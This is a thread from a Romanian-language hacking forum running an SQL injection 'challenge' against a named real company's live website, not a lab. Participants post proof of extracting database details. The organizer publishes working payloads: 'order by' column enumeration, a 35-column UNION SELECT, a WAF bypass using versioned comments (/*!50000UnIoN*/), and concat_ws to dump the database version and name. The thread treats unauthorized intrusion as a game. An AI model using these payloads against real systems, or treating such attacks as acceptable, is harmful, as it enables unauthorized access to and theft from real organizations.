Jump to content
dancezar

[Mediu] Sql injection

Recommended Posts

  • Active Members
Posted (edited)

Target:Cepco Management

Dificulty:Mediu

Proof:

View image: prooff

Cerinte:

-Scoateti versiunea si numele bazei de date impreuna cu nick-ul vostru pe o singura coloana

-Faceti o poza cenzurata si o postati aici

-Trimiteti sintaxa prin PM

-Nu dati hinturi

Solvers:

-Hannibal

-electrotech93

-Renegade

-qwerty12 (muie ba)

//Challenge Closed

Rezolvarea este in felul urmator:

-Pentru a numara coloanele folosim

') order by 1+--+

Din cate imi amintesc erau 35 de coloane

Apoi daca incercam sa facem union:') union select 1,2,3,4,5,6,7......35+--+

Primeam 403 Forbiten Union este filtrat astfel vom aplica metoda cu comentarii pentru a trece de WAF /*!50000UnIoN*/

') /*!50000UnIoN*/ Select 1,2,3,4,5,6,7,....35+--+

Mai ramanea sa faceti concat sa scoateti versiune db si nick.Daca incercam sa facem concat() vom primi 403 puteti folosi acelasi metoda ca mai sus cu comentarii sau mai simplu si elegant cu concat_ws(0x3a,version(),database())

Felicitari tuturor!! Va astept si la urmatorul challenge

Edited by danyweb09
  • Active Members
Posted

Normal ca union , nu am specificat pentru se intelege de la sine,mai merge si blind sau timebased ceea ce se face cu un tool iar rezultatul nu ar fi ca in poza mea.Daca te referi la error based nu merge pt ca erroarea iti spune ca mysql_fetch_array nu a returnat rezultate dar nu iti arata eroarea aia You have a sintax error balaalabalba,ar fi fost prea simplu.

Mai incerca;)

Posted (edited)

Nu am incercat inca challenge-ul, te-am intrebat pentru ca nu ai specificat, ma gandeam ca ai alte cerinte.

Oricum, m-am lamurit, UNION BASED.

//LE: Destul de usor, multumesc pentru challenge.

oVItY.png

Edited by Hannibal.
Posted (edited)

Salut, bine v-am regasit. Dupa o perioada de inactivitate, am zis ca ar fi cazul sa mai revin si eu, si pentru inceput cel mai bine cred ca ar fi cu un challenge, poate un tutorial, ceva mai marunt.

ON topic:

www_cepcomanagement_com.png

Nu cred ca este exact la ce te asteptai, dar mersi pentru challenge.

Edited by BitMap
  • Active Members
Posted
Renegade sunt sigur ca Pasarica nu se supara ca am facut asta..oricum nu mai posta nimeni nimic..

off: Ba se supara:| Si daca imi trimite acuma unu PM si imi zice ca a vrut sa faca challengeul da n-a avut loc de tine:)).

Oricum am postat si un "tutorial" cum am rezolvat eu.

Alta data intreaba inainte sa postezi:).

ON : Felicitari tuturor va astept la urmatorul challenge.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...